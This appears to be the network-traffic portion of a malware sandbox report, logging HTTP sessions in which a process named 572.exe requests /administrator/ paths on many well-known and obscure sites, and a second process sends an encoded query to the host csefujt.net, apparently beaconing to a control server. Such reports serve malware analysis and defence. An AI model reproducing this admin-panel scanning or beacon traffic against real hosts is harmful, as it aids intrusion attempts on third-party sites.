                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its
Feb 5, 2024 12:14:50.670398951 CET | 97 | IN | Data Ascii: name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
142 | 192.168.2.6 | 54981 | 184.25.164.103 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.392215014 CET | 186 | OUT | GET /administrator/ HTTP/1.1
Host: store.steampowered.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.570204973 CET | 351 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx
Content-Type: text/html
Content-Length: 138
Location: https://store.steampowered.com/administrator/
Date: Mon, 05 Feb 2024 11:14:50 GMT
Connection: keep-alive
Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.178834915 CET195OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: store.steampowered.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.357201099 CET | 360 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 138
                                                                                                                                                                                                                                                                                                                                                                Location: https://store.steampowered.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
143 | 192.168.2.6 | 54965 | 104.21.85.95 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.394535065 CET | 177 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: v.xsanime.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.521079063 CET | 669 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://v.xsanime.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DaX0OiNBqp%2B61XmKPRKf%2BGEAo06WNkW6IANeo9Al7NeXzUapedPHdpi9vIqSAmTGMh%2Fc8b6FzkbIPhLHY7kbsesEb9BaMWny9AWlg1ssgU6UASGt%2FHMrCdAuAYXRvYk9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb694c8eb02c-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
Feb 5, 2024 12:16:06.176841974 CET | 186 | OUT | GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: v.xsanime.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.302222967 CET | 682 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://v.xsanime.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FPCdrO%2F0F0rdsPSqv%2BWchphg%2BDrLWcAxNEjNxiqdPVieTA9YJ5U5KwAnOZXPme3HyXknzQYqTUeAOc8e%2BD4H3TSHwfQL%2BZoK9MfG9sXd7oh2NtEMrBxpN2z2S5DmYGxt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd42efb5b02c-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
144 | 192.168.2.6 | 54982 | 142.250.105.84 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.395360947 CET | 183 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.521095037 CET | 488 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 185
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
Feb 5, 2024 12:16:06.291250944 CET | 192 | OUT | GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.411828995 CET | 497 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 192
                                                                                                                                                                                                                                                                                                                                                                Server: GSE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
145 | 192.168.2.6 | 54980 | 3.141.96.53 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.408878088 CET | 177 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: money-farm.cc
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.531687021 CET | 152 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                location: https://money-farm.cc/administrator/
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
146 | 192.168.2.6 | 54983 | 45.60.0.44 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.410065889 CET | 179 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: m.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.755603075 CET | 963 | IN | HTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.codere.com.co/administrator/
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 161
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: visid_incap_2786379=7QC+lUlNToGXKQhFEhKNVCrDwGUAAAAAQUIPAAAAAABoY1sRlcvFLFRpAIbEpOgZ; expires=Tue, 04 Feb 2025 10:21:08 GMT; HttpOnly; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: nlbi_2786379=jaZYOz0iyxXl6zibaJQkpgAAAABWyDh9KaHbPtBvXejIdDEA; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: incap_ses_1816_2786379=xCiSFMx9XlQPHxA+arozGSrDwGUAAAAAfL7s04dQA8ZJXhS3hRJ27Q==; path=/; Domain=.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                X-CDN: Imperva
                                                                                                                                                                                                                                                                                                                                                                X-Iinfo: 5-35831516-35831517 NNNN CT(118 -1 0) RT(1707131690203 0) q(0 0 1 1) r(2 2) U24
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 6d 2e 63 6f 64 65 72 65 2e 63 6f 6d 2e 63 6f 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://m.codere.com.co/administrator/">here</a></body>
Feb 5, 2024 12:16:06.183393955 CET | 426 | OUT | GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: m.codere.com.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: incap_ses_1816_2786379=xCiSFMx9XlQPHxA+arozGSrDwGUAAAAAfL7s04dQA8ZJXhS3hRJ27Q==; visid_incap_2786379=7QC+lUlNToGXKQhFEhKNVCrDwGUAAAAAQUIPAAAAAABoY1sRlcvFLFRpAIbEpOgZ; nlbi_2786379=jaZYOz0iyxXl6zibaJQkpgAAAABWyDh9KaHbPtBvXejIdDEA
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.405647039 CET | 578 | IN | HTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.codere.com.co/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:05 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 170
                                                                                                                                                                                                                                                                                                                                                                X-CDN: Imperva
                                                                                                                                                                                                                                                                                                                                                                X-Iinfo: 5-35831516-35835161 NNNY CT(118 -1 0) RT(1707131690203 75773) q(0 0 0 -1) r(1 1) U24
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 6d 2e 63 6f 64 65 72 65 2e 63 6f 6d 2e 63 6f 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://m.codere.com.co/administrator/index.php">here</a></body>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
147 | 192.168.2.6 | 55004 | 31.13.88.1 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.456953049 CET | 182 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: hi-in.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:50.558765888 CET216INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://hi-in.facebook.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.120822906 CET191OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: hi-in.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:53.223073959 CET225INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://hi-in.facebook.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
148 | 192.168.2.6 | 52173 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.461612940 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:50.707020044 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
149 | 192.168.2.6 | 55008 | 31.13.65.1 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.464519978 CET | 182 | OUT | GET /administrator/ HTTP/1.1
Host: es-la.facebook.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.566416979 CET | 216 | IN | HTTP/1.1 301 Moved Permanently
Location: https://es-la.facebook.com/administrator/
Content-Type: text/plain
Server: proxygen-bolt
Date: Mon, 05 Feb 2024 11:14:50 GMT
Connection: keep-alive
Content-Length: 0
Feb 5, 2024 12:16:06.351864100 CET | 191 | OUT | GET /administrator/index.php HTTP/1.1
Host: es-la.facebook.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.453955889 CET | 220 | IN | HTTP/1.1 301 Moved Permanently
Location: https://es-la.facebook.com/administrator/index.php
Content-Type: text/plain
Server: proxygen-bolt
Date: Mon, 05 Feb 2024 11:16:06 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
150 | 192.168.2.6 | 55013 | 184.25.164.103 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.479259968 CET | 186 | OUT | GET /administrator/ HTTP/1.1
Host: store.steampowered.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.664153099 CET | 351 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx
Content-Type: text/html
Content-Length: 138
Location: https://store.steampowered.com/administrator/
Date: Mon, 05 Feb 2024 11:14:50 GMT
Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>
Feb 5, 2024 12:14:53.136838913 CET | 195 | OUT | GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: store.steampowered.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:53.313245058 CET | 360 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 138
                                                                                                                                                                                                                                                                                                                                                                Location: https://store.steampowered.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
151 | 192.168.2.6 | 55009 | 104.22.74.220 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.482208967 CET | 177 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mojadovera.sk
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.609949112 CET | 348 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://mojadovera.sk/administrator/
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb69debdb171-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
Feb 5, 2024 12:16:06.188359976 CET | 186 | OUT | GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mojadovera.sk
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.314400911 CET | 357 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://mojadovera.sk/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd430b8ab171-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
152 | 192.168.2.6 | 55011 | 104.26.8.17 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:50.490895987 CET | 171 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: rage.mp
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:50.621308088 CET | 688 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:14:50 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://rage.mp/administrator/
